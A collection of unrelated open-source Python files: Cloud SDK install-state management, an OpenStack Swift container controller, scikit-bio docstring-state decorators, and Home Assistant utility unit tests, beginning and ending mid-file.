url, download_dir, extract_dir, progress_callback=progress_callback,
command_path='components.reinstall')
files = os.listdir(extract_dir)
if len(files) != 1:
raise InvalidDownloadError()
sdk_root = os.path.join(extract_dir, files[0])
file_utils.MoveDir(sdk_root, self.__sdk_staging_root)
staging_sdk = InstallationState(self.__sdk_staging_root)
# pylint: disable=protected-access, This is an instance of InstallationState
staging_sdk._CreateStateDir()
self.CopyMachinePropertiesTo(staging_sdk)
return staging_sdk
@_RaisesPermissionsError
def ReplaceWith(self, other_install_state, progress_callback=None):
"""Replaces this installation with the given other installation.
This moves the current installation to the backup directory of the other
installation. Then, it moves the entire second installation to replace
this one on the file system. The result is that the other installation
completely replaces the current one, but the current one is snapshotted and
stored as a backup under the new one (and can be restored later).
Args:
other_install_state: InstallationState, The other state with which to
replace this one.
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
self._CreateStateDir()
self.ClearBackup()
self.ClearTrash()
# pylint: disable=protected-access, This is an instance of InstallationState
other_install_state._CreateStateDir()
other_install_state.ClearBackup()
# pylint: disable=protected-access, This is an instance of InstallationState
file_utils.MoveDir(self.__sdk_root, other_install_state.__backup_directory)
if progress_callback:
progress_callback(0.5)
file_utils.MoveDir(other_install_state.__sdk_root, self.__sdk_root)
if progress_callback:
progress_callback(1.0)
@_RaisesPermissionsError
def RestoreBackup(self):
"""Restore the backup from this install state if it exists.
If this installation has a backup stored in it (created by and update that
used ReplaceWith(), above), it replaces this installation with the backup,
using a temporary staging area. This installation is moved to the trash
directory under the installation that exists after this is done. The trash
directory can be removed at any point in the future. We just don't want to
delete code that is running since some platforms have a problem with that.
Returns:
bool, True if there was a backup to restore, False otherwise.
"""
if not self.HasBackup():
return False
self._ClearStaging()
file_utils.MoveDir(self.__backup_directory, self.__sdk_staging_root)
staging_state = InstallationState(self.__sdk_staging_root)
# pylint: disable=protected-access, This is an instance of InstallationState
staging_state._CreateStateDir()
staging_state.ClearTrash()
# pylint: disable=protected-access, This is an instance of InstallationState
file_utils.MoveDir(self.__sdk_root, staging_state.__trash_directory)
file_utils.MoveDir(staging_state.__sdk_root, self.__sdk_root)
return True
def HasBackup(self):
"""Determines if this install has a valid backup that can be restored.
Returns:
bool, True if there is a backup, False otherwise.
"""
return os.path.isdir(self.__backup_directory)
def BackupDirectory(self):
"""Gets the backup directory of this installation if it exists.
Returns:
str, The path to the backup directory or None if it does not exist.
"""
if self.HasBackup():
return self.__backup_directory
return None
@_RaisesPermissionsError
def _ClearStaging(self, progress_callback=None):
"""Deletes the current staging directory if it exists.
Args:
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
if os.path.exists(self.__sdk_staging_root):
file_utils.RmTree(self.__sdk_staging_root)
if progress_callback:
progress_callback(1)
@_RaisesPermissionsError
def ClearBackup(self, progress_callback=None):
"""Deletes the current backup if it exists.
Args:
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
if os.path.isdir(self.__backup_directory):
file_utils.RmTree(self.__backup_directory)
if progress_callback:
progress_callback(1)
@_RaisesPermissionsError
def ClearTrash(self, progress_callback=None):
"""Deletes the current trash directory if it exists.
Args:
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
if os.path.isdir(self.__trash_directory):
file_utils.RmTree(self.__trash_directory)
if progress_callback:
progress_callback(1)
def _GetInstaller(self, snapshot):
"""Gets a component installer based on the given snapshot.
Args:
snapshot: snapshots.ComponentSnapshot, The snapshot that describes the
component to install.
Returns:
The installers.ComponentInstaller.
"""
return installers.ComponentInstaller(self.__sdk_root,
self._state_directory,
snapshot)
@_RaisesPermissionsError
def Install(self, snapshot, component_id, progress_callback=None,
command_path='unknown'):
"""Installs the given component based on the given snapshot.
Args:
snapshot: snapshots.ComponentSnapshot, The snapshot that describes the
component to install.
component_id: str, The component to install from the given snapshot.
progress_callback: f(float), A function to call with the fraction of
completeness.
command_path: the command path to include in the User-Agent header if the
URL is HTTP
Raises:
installers.URLFetchError: If the component associated with the provided
component ID has a URL that is not fetched correctly.
"""
self._CreateStateDir()
files = self._GetInstaller(snapshot).Install(
component_id, progress_callback=progress_callback,
command_path=command_path)
manifest = InstallationManifest(self._state_directory, component_id)
manifest.MarkInstalled(snapshot, files)
@_RaisesPermissionsError
def Uninstall(self, component_id, progress_callback=None):
"""Uninstalls the given component.
Deletes all the files for this component and marks it as no longer being
installed.
Args:
component_id: str, The id of the component to uninstall.
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
manifest = InstallationManifest(self._state_directory, component_id)
paths = manifest.InstalledPaths()
total_paths = float(len(paths))
root = self.__sdk_root
dirs_to_remove = set()
for num, p in enumerate(paths, start=1):
path = os.path.join(root, p)
if os.path.isfile(path) or os.path.islink(path):
os.remove(path)
# Clean up the pyc files that correspond to any py files being removed.
if p.endswith('.py'):
pyc_path = path + 'c'
if os.path.isfile(pyc_path):
os.remove(pyc_path)
dir_path = os.path.dirname(path)
if dir_path:
dirs_to_remove.add(os.path.normpath(dir_path))
elif os.path.isdir(path):
dirs_to_remove.add(os.path.normpath(path))
if progress_callback:
progress_callback(num / total_paths)
# Remove dirs from the bottom up. Subdirs will always have a longer path
# than it's parent.
for d in sorted(dirs_to_remove, key=len, reverse=True):
if os.path.isdir(d) and not os.path.islink(d) and not os.listdir(d):
os.rmdir(d)
manifest.MarkUninstalled()
def CopyMachinePropertiesTo(self, other_state):
"""Copy this state's properties file to another state.
This is primarily intended to be used to maintain the machine properties
file during a schema-change-induced reinstall.
Args:
other_state: InstallationState, The installation state of the fresh
Cloud SDK that needs the properties file mirrored in.
"""
my_properties = os.path.join(
self.sdk_root, config.Paths.CLOUDSDK_PROPERTIES_NAME)
other_properties = os.path.join(
other_state.sdk_root, config.Paths.CLOUDSDK_PROPERTIES_NAME)
if not os.path.exists(my_properties):
return
shutil.copyfile(my_properties, other_properties)
def CompilePythonFiles(self):
"""Attempts to compile all the python files into .pyc files.
This does not raise exceptions if compiling a given file fails.
"""
root = self.sdk_root
to_compile = [
os.path.join(root, 'bin', 'bootstrapping'),
os.path.join(root, 'lib'),
os.path.join(root, 'platform'),
]
for d in to_compile:
compileall.compile_dir(d, quiet=True)
class InstallationManifest(object):
"""Class to encapsulate the data stored in installation manifest files."""
MANIFEST_SUFFIX = '.manifest'
def __init__(self, state_dir, component_id):
"""Creates a new InstallationManifest.
Args:
state_dir: str, The directory path where install state is stored.
component_id: str, The component id that you want to get the manifest for.
"""
self.state_dir = state_dir
self.id = component_id
self.snapshot_file = os.path.join(
self.state_dir,
component_id + InstallationState.COMPONENT_SNAPSHOT_FILE_SUFFIX)
self.manifest_file = os.path.join(
self.state_dir,
component_id + InstallationManifest.MANIFEST_SUFFIX)
def MarkInstalled(self, snapshot, files):
"""Marks this component as installed with the given snapshot and files.
This saves the ComponentSnapshot and writes the installed files to a
manifest so they can be removed later.
Args:
snapshot: snapshots.ComponentSnapshot, The snapshot that was the source
of the install.
files: list of str, The files that were created by the installation.
"""
with open(self.manifest_file, 'w') as fp:
for f in files:
fp.write(f + '\n')
snapshot.WriteToFile(self.snapshot_file)
def MarkUninstalled(self):
"""Marks this component as no longer being installed.
This does not actually uninstall the component, but rather just removes the
snapshot and manifest.
"""
for f in [self.manifest_file, self.snapshot_file]:
if os.path.isfile(f):
os.remove(f)
def ComponentSnapshot(self):
"""Loads the local ComponentSnapshot for this component.
Returns:
The snapshots.ComponentSnapshot for this component.
"""
return snapshots.ComponentSnapshot.FromFile(self.snapshot_file)
def ComponentDefinition(self):
"""Loads the ComponentSnapshot and get the schemas.Component this component.
Returns:
The schemas.Component for this component.
"""
return self.ComponentSnapshot().ComponentFromId(self.id)
def VersionString(self):
"""Gets the version string of this component as it was installed.
Returns:
str, The installed version of this component.
"""
return self.ComponentDefinition().version.version_string
def InstalledPaths(self):
"""Gets the list of files and dirs created by installing this component.
Returns:
list of str, The files and directories installed by this component.
"""
with open(self.manifest_file) as f:
files = [line.rstrip() for line in f]
return files
def InstalledDirectories(self):
"""Gets the set of directories created by installing this component.
Returns:
set(str), The directories installed by this component.
"""
with open(self.manifest_file) as f:
dirs = set()
for line in f:
fixed = line.rstrip()
if fixed.endswith('/'):
dirs.add(fixed)
return dirs
| |
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from swift import gettext_ as _
import time
from six.moves.urllib.parse import unquote
from swift.common.utils import public, csv_append, Timestamp
from swift.common.constraints import check_metadata
from swift.common import constraints
from swift.common.http import HTTP_ACCEPTED, is_success
from swift.proxy.controllers.base import Controller, delay_denial, \
cors_validation, set_info_cache, clear_info_cache
from swift.common.storage_policy import POLICIES
from swift.common.swob import HTTPBadRequest, HTTPForbidden, \
HTTPNotFound
class ContainerController(Controller):
"""WSGI controller for container requests"""
server_type = 'Container'
# Ensure these are all lowercase
pass_through_headers = ['x-container-read', 'x-container-write',
'x-container-sync-key', 'x-container-sync-to',
'x-versions-location']
def __init__(self, app, account_name, container_name, **kwargs):
Controller.__init__(self, app)
self.account_name = unquote(account_name)
self.container_name = unquote(container_name)
def _x_remove_headers(self):
st = self.server_type.lower()
return ['x-remove-%s-read' % st,
'x-remove-%s-write' % st,
'x-remove-versions-location',
'x-remove-%s-sync-key' % st,
'x-remove-%s-sync-to' % st]
def _convert_policy_to_index(self, req):
"""
Helper method to convert a policy name (from a request from a client)
to a policy index (for a request to a backend).
:param req: incoming request
"""
policy_name = req.headers.get('X-Storage-Policy')
if not policy_name:
return
policy = POLICIES.get_by_name(policy_name)
if not policy:
raise HTTPBadRequest(request=req,
content_type="text/plain",
body=("Invalid %s '%s'"
% ('X-Storage-Policy', policy_name)))
if policy.is_deprecated:
body = 'Storage Policy %r is deprecated' % (policy.name)
raise HTTPBadRequest(request=req, body=body)
return int(policy)
def clean_acls(self, req):
if 'swift.clean_acl' in req.environ:
for header in ('x-container-read', 'x-container-write'):
if header in req.headers:
try:
req.headers[header] = \
req.environ['swift.clean_acl'](header,
req.headers[header])
except ValueError as err:
return HTTPBadRequest(request=req, body=str(err))
return None
def GETorHEAD(self, req):
"""Handler for HTTP GET/HEAD requests."""
ai = self.account_info(self.account_name, req)
if not ai[1]:
if 'swift.authorize' in req.environ:
aresp = req.environ['swift.authorize'](req)
if aresp:
# Don't cache this. It doesn't reflect the state of the
# container, just that the user can't access it.
return aresp
# Don't cache this. The lack of account will be cached, and that
# is sufficient.
return HTTPNotFound(request=req)
part = self.app.container_ring.get_part(
self.account_name, self.container_name)
concurrency = self.app.container_ring.replica_count \
if self.app.concurrent_gets else 1
node_iter = self.app.iter_nodes(self.app.container_ring, part)
resp = self.GETorHEAD_base(
req, _('Container'), node_iter, part,
req.swift_entity_path, concurrency)
# Cache this. We just made a request to a storage node and got
# up-to-date information for the container.
resp.headers['X-Backend-Recheck-Container-Existence'] = str(
self.app.recheck_container_existence)
set_info_cache(self.app, req.environ, self.account_name,
self.container_name, resp)
if 'swift.authorize' in req.environ:
req.acl = resp.headers.get('x-container-read')
aresp = req.environ['swift.authorize'](req)
if aresp:
# Don't cache this. It doesn't reflect the state of the
# container, just that the user can't access it.
return aresp
if not req.environ.get('swift_owner', False):
for key in self.app.swift_owner_headers:
if key in resp.headers:
del resp.headers[key]
return resp
@public
@delay_denial
@cors_validation
def GET(self, req):
"""Handler for HTTP GET requests."""
return self.GETorHEAD(req)
@public
@delay_denial
@cors_validation
def HEAD(self, req):
"""Handler for HTTP HEAD requests."""
return self.GETorHEAD(req)
@public
@cors_validation
def PUT(self, req):
"""HTTP PUT request handler."""
error_response = \
self.clean_acls(req) or check_metadata(req, 'container')
if error_response:
return error_response
policy_index = self._convert_policy_to_index(req)
if not req.environ.get('swift_owner'):
for key in self.app.swift_owner_headers:
req.headers.pop(key, None)
if len(self.container_name) > constraints.MAX_CONTAINER_NAME_LENGTH:
resp = HTTPBadRequest(request=req)
resp.body = 'Container name length of %d longer than %d' % \
(len(self.container_name),
constraints.MAX_CONTAINER_NAME_LENGTH)
return resp
account_partition, accounts, container_count = \
self.account_info(self.account_name, req)
if not accounts and self.app.account_autocreate:
self.autocreate_account(req, self.account_name)
account_partition, accounts, container_count = \
self.account_info(self.account_name, req)
if not accounts:
return HTTPNotFound(request=req)
if 0 < self.app.max_containers_per_account <= container_count and \
self.account_name not in self.app.max_containers_whitelist:
container_info = \
self.container_info(self.account_name, self.container_name,
req)
if not is_success(container_info.get('status')):
resp = HTTPForbidden(request=req)
resp.body = 'Reached container limit of %s' % \
self.app.max_containers_per_account
return resp
container_partition, containers = self.app.container_ring.get_nodes(
self.account_name, self.container_name)
headers = self._backend_requests(req, len(containers),
account_partition, accounts,
policy_index)
clear_info_cache(self.app, req.environ,
self.account_name, self.container_name)
resp = self.make_requests(
req, self.app.container_ring,
container_partition, 'PUT', req.swift_entity_path, headers)
return resp
@public
@cors_validation
def POST(self, req):
"""HTTP POST request handler."""
error_response = \
self.clean_acls(req) or check_metadata(req, 'container')
if error_response:
return error_response
if not req.environ.get('swift_owner'):
for key in self.app.swift_owner_headers:
req.headers.pop(key, None)
account_partition, accounts, container_count = \
self.account_info(self.account_name, req)
if not accounts:
return HTTPNotFound(request=req)
container_partition, containers = self.app.container_ring.get_nodes(
self.account_name, self.container_name)
headers = self.generate_request_headers(req, transfer=True)
clear_info_cache(self.app, req.environ,
self.account_name, self.container_name)
resp = self.make_requests(
req, self.app.container_ring, container_partition, 'POST',
req.swift_entity_path, [headers] * len(containers))
return resp
@public
@cors_validation
def DELETE(self, req):
"""HTTP DELETE request handler."""
account_partition, accounts, container_count = \
self.account_info(self.account_name, req)
if not accounts:
return HTTPNotFound(request=req)
container_partition, containers = self.app.container_ring.get_nodes(
self.account_name, self.container_name)
headers = self._backend_requests(req, len(containers),
account_partition, accounts)
clear_info_cache(self.app, req.environ,
self.account_name, self.container_name)
resp = self.make_requests(
req, self.app.container_ring, container_partition, 'DELETE',
req.swift_entity_path, headers)
# Indicates no server had the container
if resp.status_int == HTTP_ACCEPTED:
return HTTPNotFound(request=req)
return resp
def _backend_requests(self, req, n_outgoing, account_partition, accounts,
policy_index=None):
additional = {'X-Timestamp': Timestamp(time.time()).internal}
if policy_index is None:
additional['X-Backend-Storage-Policy-Default'] = \
int(POLICIES.default)
else:
additional['X-Backend-Storage-Policy-Index'] = str(policy_index)
headers = [self.generate_request_headers(req, transfer=True,
additional=additional)
for _junk in range(n_outgoing)]
for i, account in enumerate(accounts):
i = i % len(headers)
headers[i]['X-Account-Partition'] = account_partition
headers[i]['X-Account-Host'] = csv_append(
headers[i].get('X-Account-Host'),
'%(ip)s:%(port)s' % account)
headers[i]['X-Account-Device'] = csv_append(
headers[i].get('X-Account-Device'),
account['device'])
return headers
| |
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import warnings
import textwrap
import decorator
from ._exception import OverrideError
class _state_decorator(object):
""" Base class for decorators of all public functionality.
"""
_required_kwargs = ()
def _get_indentation_level(self, docstring_lines,
default_existing_docstring=4,
default_no_existing_docstring=0):
""" Determine the level of indentation of the docstring to match it.
The indented content after the first line of a docstring can
differ based on the nesting of the functionality being documented.
For example, a top-level function may have its "Parameters" section
indented four-spaces, but a method nested under a class may have
its "Parameters" section indented eight spaces. This function
determines the indentation level of the first non-whitespace line
following the initial summary line.
"""
# if there is no existing docstring, return the corresponding default
if len(docstring_lines) == 0:
return default_no_existing_docstring
# if there is an existing docstring with only a single line, return
# the corresponding default
if len(docstring_lines) == 1:
return default_existing_docstring
# find the first non-blank line (after the initial summary line) and
# return the number of leading spaces on that line
for line in docstring_lines[1:]:
if len(line.strip()) == 0:
# ignore blank lines
continue
else:
return len(line) - len(line.lstrip())
# if there is an existing docstring with only a single non-whitespace
# line, return the corresponding default
return default_existing_docstring
def _update_docstring(self, docstring, state_desc,
state_desc_prefix='State: '):
# Hande the case of no initial docstring
if docstring is None:
return "%s%s" % (state_desc_prefix, state_desc)
docstring_lines = docstring.split('\n')
docstring_content_indentation = \
self._get_indentation_level(docstring_lines)
# wrap lines at 79 characters, accounting for the length of
# docstring_content_indentation and start_desc_prefix
len_state_desc_prefix = len(state_desc_prefix)
wrap_at = 79 - (docstring_content_indentation + len_state_desc_prefix)
state_desc_lines = textwrap.wrap(state_desc, wrap_at)
# The first line of the state description should start with
# state_desc_prefix, while the others should start with spaces to align
# the text in this section. This is for consistency with numpydoc
# formatting of deprecation notices, which are done using the note
# Sphinx directive.
state_desc_lines[0] = '%s%s%s' % (' ' * docstring_content_indentation,
state_desc_prefix,
state_desc_lines[0])
header_spaces = ' ' * (docstring_content_indentation +
len_state_desc_prefix)
for i, line in enumerate(state_desc_lines[1:], 1):
state_desc_lines[i] = '%s%s' % (header_spaces, line)
new_doc_lines = '\n'.join(state_desc_lines)
docstring_lines[0] = '%s\n\n%s' % (docstring_lines[0], new_doc_lines)
return '\n'.join(docstring_lines)
def _validate_kwargs(self, **kwargs):
for required_kwarg in self._required_kwargs:
if required_kwarg not in kwargs:
raise ValueError('%s decorator requires parameter: %s' %
(self.__class__, required_kwarg))
class stable(_state_decorator):
""" State decorator indicating stable functionality.
Used to indicate that public functionality is considered ``stable``,
meaning that its API will be backward compatible unless it is deprecated.
Decorating functionality as stable will update its doc string to indicate
the first version of scikit-bio when the functionality was considered
stable.
Parameters
----------
as_of : str
First release version where functionality is considered to be stable.
See Also
--------
experimental
deprecated
Examples
--------
>>> @stable(as_of='0.3.0')
... def f_stable():
... \"\"\" An example stable function.
... \"\"\"
... pass
>>> help(f_stable)
Help on function f_stable in module skbio.util._decorator:
<BLANKLINE>
f_stable()
An example stable function.
<BLANKLINE>
State: Stable as of 0.3.0.
<BLANKLINE>
"""
_required_kwargs = ('as_of', )
def __init__(self, *args, **kwargs):
self._validate_kwargs(**kwargs)
self.as_of = kwargs['as_of']
def __call__(self, func):
state_desc = 'Stable as of %s.' % self.as_of
func.__doc__ = self._update_docstring(func.__doc__, state_desc)
return func
class experimental(_state_decorator):
""" State decorator indicating experimental functionality.
Used to indicate that public functionality is considered experimental,
meaning that its API is subject to change or removal with little or
(rarely) no warning. Decorating functionality as experimental will update
its doc string to indicate the first version of scikit-bio when the
functionality was considered experimental.
Parameters
----------
as_of : str
First release version where feature is considered to be experimental.
See Also
--------
stable
deprecated
Examples
--------
>>> @experimental(as_of='0.3.0')
... def f_experimental():
... \"\"\" An example experimental function.
... \"\"\"
... pass
>>> help(f_experimental)
Help on function f_experimental in module skbio.util._decorator:
<BLANKLINE>
f_experimental()
An example experimental function.
<BLANKLINE>
State: Experimental as of 0.3.0.
<BLANKLINE>
"""
_required_kwargs = ('as_of', )
def __init__(self, *args, **kwargs):
self._validate_kwargs(**kwargs)
self.as_of = kwargs['as_of']
def __call__(self, func):
state_desc = 'Experimental as of %s.' % self.as_of
func.__doc__ = self._update_docstring(func.__doc__, state_desc)
return func
class deprecated(_state_decorator):
""" State decorator indicating deprecated functionality.
Used to indicate that a public class or function is deprecated, meaning
that its API will be removed in a future version of scikit-bio. Decorating
functionality as deprecated will update its doc string to indicate the
first version of scikit-bio when the functionality was deprecated, the
first version of scikit-bio when the functionality will no longer exist,
and the reason for deprecation of the API. It will also cause calls to the
API to raise a ``DeprecationWarning``.
Parameters
----------
as_of : str
First development version where feature is considered to be deprecated.
until : str
First release version where feature will no longer exist.
reason : str
Brief description of why the API is deprecated.
See Also
--------
stable
experimental
Examples
--------
>>> @deprecated(as_of='0.3.0', until='0.3.3',
... reason='Use skbio.g().')
... def f_deprecated(x, verbose=False):
... \"\"\" An example deprecated function.
... \"\"\"
... pass
>>> help(f_deprecated)
Help on function f_deprecated in module skbio.util._decorator:
<BLANKLINE>
f_deprecated(x, verbose=False)
An example deprecated function.
<BLANKLINE>
.. note:: Deprecated as of 0.3.0 for removal in 0.3.3. Use skbio.g().
<BLANKLINE>
"""
_required_kwargs = ('as_of', 'until', 'reason')
def __init__(self, *args, **kwargs):
self._validate_kwargs(**kwargs)
self.as_of = kwargs['as_of']
self.until = kwargs['until']
self.reason = kwargs['reason']
def __call__(self, func, *args, **kwargs):
state_desc = 'Deprecated as of %s for removal in %s. %s' %\
(self.as_of, self.until, self.reason)
func.__doc__ = self._update_docstring(func.__doc__, state_desc,
state_desc_prefix='.. note:: ')
def wrapped_f(*args, **kwargs):
warnings.warn('%s is deprecated as of scikit-bio version %s, and '
'will be removed in version %s. %s' %
(func.__name__, self.as_of, self.until, self.reason),
DeprecationWarning)
# args[0] is the function being wrapped when this is called
# after wrapping with decorator.decorator, but why???
return func(*args[1:], **kwargs)
return decorator.decorator(wrapped_f, func)
# Adapted from http://stackoverflow.com/a/8313042/579416
def overrides(interface_class):
"""Decorator for class-level members.
Used to indicate that a member is being overridden from a specific parent
class. If the member does not have a docstring, it will pull one from the
parent class. When chaining decorators, this should be first as it is
relatively nondestructive.
Parameters
----------
interface_class : class
The class which has a member overridden by the decorated member.
Returns
-------
function
The function is not changed or replaced.
Raises
------
OverrideError
If the `interface_class` does not possess a member of the same name
as the decorated member.
"""
def overrider(method):
if method.__name__ not in dir(interface_class):
raise OverrideError("%r is not present in parent class: %r." %
(method.__name__, interface_class.__name__))
backup = classproperty.__get__
classproperty.__get__ = lambda x, y, z: x
if method.__doc__ is None:
method.__doc__ = getattr(interface_class, method.__name__).__doc__
classproperty.__get__ = backup
return method
return overrider
class classproperty(property):
"""Decorator for class-level properties.
Supports read access only. The property will be read-only within an
instance. However, the property can always be redefined on the class, since
Python classes are mutable.
Parameters
----------
func : function
Method to make a class property.
Returns
-------
property
Decorated method.
Raises
------
AttributeError
If the property is set on an instance.
"""
def __init__(self, func):
name = func.__name__
doc = func.__doc__
super(classproperty, self).__init__(classmethod(func))
self.__name__ = name
self.__doc__ = doc
def __get__(self, cls, owner):
return self.fget.__get__(None, owner)()
def __set__(self, obj, value):
raise AttributeError("can't set attribute")
class classonlymethod(classmethod):
"""Just like `classmethod`, but it can't be called on an instance."""
def __init__(self, function):
super(classonlymethod, self).__init__(function)
def __get__(self, obj, cls=None):
if obj is not None:
raise TypeError("Class-only method called on an instance. Use"
" '%s.%s' instead."
% (cls.__name__, self.__func__.__name__))
evaldict = self.__func__.__globals__.copy()
evaldict['_call_'] = self.__func__
evaldict['_cls_'] = cls
fun = FunctionMakerDropFirstArg.create(
self.__func__, "return _call_(_cls_, %(shortsignature)s)",
evaldict, __wrapped__=self.__func__)
fun.__func__ = self.__func__ # Doctests need the orginal function
return fun
class FunctionMakerDropFirstArg(decorator.FunctionMaker):
def __init__(self, *args, **kwargs):
super(FunctionMakerDropFirstArg, self).__init__(*args, **kwargs)
self.signature = self._remove_first_arg(self.signature)
self.shortsignature = self._remove_first_arg(self.shortsignature)
def _remove_first_arg(self, string):
return ",".join(string.split(',')[1:])[1:]
| |
"""
tests.test_util
~~~~~~~~~~~~~~~~~
Tests Home Assistant util methods.
"""
# pylint: disable=too-many-public-methods
import unittest
import time
from datetime import datetime, timedelta
import homeassistant.util as util
class TestUtil(unittest.TestCase):
""" Tests util methods. """
def test_sanitize_filename(self):
""" Test sanitize_filename. """
self.assertEqual("test", util.sanitize_filename("test"))
self.assertEqual("test", util.sanitize_filename("/test"))
self.assertEqual("test", util.sanitize_filename("..test"))
self.assertEqual("test", util.sanitize_filename("\\test"))
self.assertEqual("test", util.sanitize_filename("\\../test"))
def test_sanitize_path(self):
""" Test sanitize_path. """
self.assertEqual("test/path", util.sanitize_path("test/path"))
self.assertEqual("test/path", util.sanitize_path("~test/path"))
self.assertEqual("//test/path",
util.sanitize_path("~/../test/path"))
def test_slugify(self):
""" Test slugify. """
self.assertEqual("Test", util.slugify("T-!@#$!#@$!$est"))
self.assertEqual("Test_More", util.slugify("Test More"))
self.assertEqual("Test_More", util.slugify("Test_(More)"))
def test_split_entity_id(self):
""" Test split_entity_id. """
self.assertEqual(['domain', 'object_id'],
util.split_entity_id('domain.object_id'))
def test_repr_helper(self):
""" Test repr_helper. """
self.assertEqual("A", util.repr_helper("A"))
self.assertEqual("5", util.repr_helper(5))
self.assertEqual("True", util.repr_helper(True))
self.assertEqual("test=1",
util.repr_helper({"test": 1}))
self.assertEqual("12:00:00 09-07-1986",
util.repr_helper(datetime(1986, 7, 9, 12, 0, 0)))
def test_convert(self):
""" Test convert. """
self.assertEqual(5, util.convert("5", int))
self.assertEqual(5.0, util.convert("5", float))
self.assertEqual(True, util.convert("True", bool))
self.assertEqual(1, util.convert("NOT A NUMBER", int, 1))
self.assertEqual(1, util.convert(None, int, 1))
def test_ensure_unique_string(self):
""" Test ensure_unique_string. """
self.assertEqual(
"Beer_3",
util.ensure_unique_string("Beer", ["Beer", "Beer_2"]))
self.assertEqual(
"Beer",
util.ensure_unique_string("Beer", ["Wine", "Soda"]))
def test_ordered_enum(self):
""" Test the ordered enum class. """
class TestEnum(util.OrderedEnum):
""" Test enum that can be ordered. """
FIRST = 1
SECOND = 2
THIRD = 3
self.assertTrue(TestEnum.SECOND >= TestEnum.FIRST)
self.assertTrue(TestEnum.SECOND >= TestEnum.SECOND)
self.assertFalse(TestEnum.SECOND >= TestEnum.THIRD)
self.assertTrue(TestEnum.SECOND > TestEnum.FIRST)
self.assertFalse(TestEnum.SECOND > TestEnum.SECOND)
self.assertFalse(TestEnum.SECOND > TestEnum.THIRD)
self.assertFalse(TestEnum.SECOND <= TestEnum.FIRST)
self.assertTrue(TestEnum.SECOND <= TestEnum.SECOND)
self.assertTrue(TestEnum.SECOND <= TestEnum.THIRD)
self.assertFalse(TestEnum.SECOND < TestEnum.FIRST)
self.assertFalse(TestEnum.SECOND < TestEnum.SECOND)
self.assertTrue(TestEnum.SECOND < TestEnum.THIRD)
# Python will raise a TypeError if the <, <=, >, >= methods
# raise a NotImplemented error.
self.assertRaises(TypeError,
lambda x, y: x < y, TestEnum.FIRST, 1)
self.assertRaises(TypeError,
lambda x, y: x <= y, TestEnum.FIRST, 1)
self.assertRaises(TypeError,
lambda x, y: x > y, TestEnum.FIRST, 1)
self.assertRaises(TypeError,
lambda x, y: x >= y, TestEnum.FIRST, 1)
def test_ordered_set(self):
set1 = util.OrderedSet([1, 2, 3, 4])
set2 = util.OrderedSet([3, 4, 5])
self.assertEqual(4, len(set1))
self.assertEqual(3, len(set2))
self.assertIn(1, set1)
self.assertIn(2, set1)
self.assertIn(3, set1)
self.assertIn(4, set1)
self.assertNotIn(5, set1)
self.assertNotIn(1, set2)
self.assertNotIn(2, set2)
self.assertIn(3, set2)
self.assertIn(4, set2)
self.assertIn(5, set2)
set1.add(5)
self.assertIn(5, set1)
set1.discard(5)
self.assertNotIn(5, set1)
# Try again while key is not in
set1.discard(5)
self.assertNotIn(5, set1)
self.assertEqual([1, 2, 3, 4], list(set1))
self.assertEqual([4, 3, 2, 1], list(reversed(set1)))
self.assertEqual(1, set1.pop(False))
self.assertEqual([2, 3, 4], list(set1))
self.assertEqual(4, set1.pop())
self.assertEqual([2, 3], list(set1))
self.assertEqual('OrderedSet()', str(util.OrderedSet()))
self.assertEqual('OrderedSet([2, 3])', str(set1))
self.assertEqual(set1, util.OrderedSet([2, 3]))
self.assertNotEqual(set1, util.OrderedSet([3, 2]))
self.assertEqual(set1, set([2, 3]))
self.assertEqual(set1, {3, 2})
self.assertEqual(set1, [2, 3])
self.assertEqual(set1, [3, 2])
self.assertNotEqual(set1, {2})
set3 = util.OrderedSet(set1)
set3.update(set2)
self.assertEqual([3, 4, 5, 2], set3)
self.assertEqual([3, 4, 5, 2], set1 | set2)
self.assertEqual([3], set1 & set2)
self.assertEqual([2], set1 - set2)
set1.update([1, 2], [5, 6])
self.assertEqual([2, 3, 1, 5, 6], set1)
def test_throttle(self):
""" Test the add cooldown decorator. """
calls1 = []
@util.Throttle(timedelta(milliseconds=500))
def test_throttle1():
calls1.append(1)
calls2 = []
@util.Throttle(
timedelta(milliseconds=500), timedelta(milliseconds=250))
def test_throttle2():
calls2.append(1)
# Ensure init is ok
self.assertEqual(0, len(calls1))
self.assertEqual(0, len(calls2))
# Call first time and ensure methods got called
test_throttle1()
test_throttle2()
self.assertEqual(1, len(calls1))
self.assertEqual(1, len(calls2))
# Call second time. Methods should not get called
test_throttle1()
test_throttle2()
self.assertEqual(1, len(calls1))
self.assertEqual(1, len(calls2))
# Call again, overriding throttle, only first one should fire
test_throttle1(no_throttle=True)
test_throttle2(no_throttle=True)
self.assertEqual(2, len(calls1))
self.assertEqual(1, len(calls2))
# Sleep past the no throttle interval for throttle2
time.sleep(.3)
test_throttle1()
test_throttle2()
self.assertEqual(2, len(calls1))
self.assertEqual(1, len(calls2))
test_throttle1(no_throttle=True)
test_throttle2(no_throttle=True)
self.assertEqual(3, len(calls1))
self.assertEqual(2, len(calls2))
time.sleep(.5)
test_throttle1()
test_throttle2()
self.assertEqual(4, len(calls1))
self.assertEqual(3, len(calls2))
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
